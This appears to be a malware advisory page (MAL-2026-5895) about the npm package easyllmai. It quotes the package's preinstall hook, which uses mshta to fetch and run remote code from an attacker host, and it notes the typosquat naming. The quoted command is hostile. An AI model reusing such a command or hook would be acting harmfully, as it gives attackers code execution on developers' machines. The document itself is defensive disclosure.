—

MAL-2026-5895

Malicious code in easyllmai (npm)

상세

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (2f3b4523b083331b34769a2a730586fa622f50560f2f237a893633e7ffb57872) On `npm install`, the package's preinstall lifecycle hook (`"preinstall": "node preinstall.js"`) unconditionally runs `exec('cmd /c "mshta http://fixars.top"')`. On Windows, mshta is a living-off-the-land binary that fetches and executes arbitrary HTML Application / JScript / VBScript content from the supplied URL with the invoking user's privileges. The destination is plain HTTP, attacker-controlled, and the delivered payload is opaque remote code with no signature, hash, or version pinning — giving the publisher full remote code execution on any Windows machine that runs `npm install`. Package metadata is also a throwaway shape (empty `description`, empty `author`, no `repository`, no `keywords`) and the name `easyllmai` is consistent with a typosquat lure against legitimate LLM-client packages.

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

npm / easyllmai

No fixed version published yet for easyllmai (npm). Pin to a known-safe version or switch to an alternative.

참고

https://www.npmjs.com/package/easyllmai/v/4.0.1 [PACKAGE]
https://www.npmjs.com/package/easyllmai/v/3.0.1 [PACKAGE]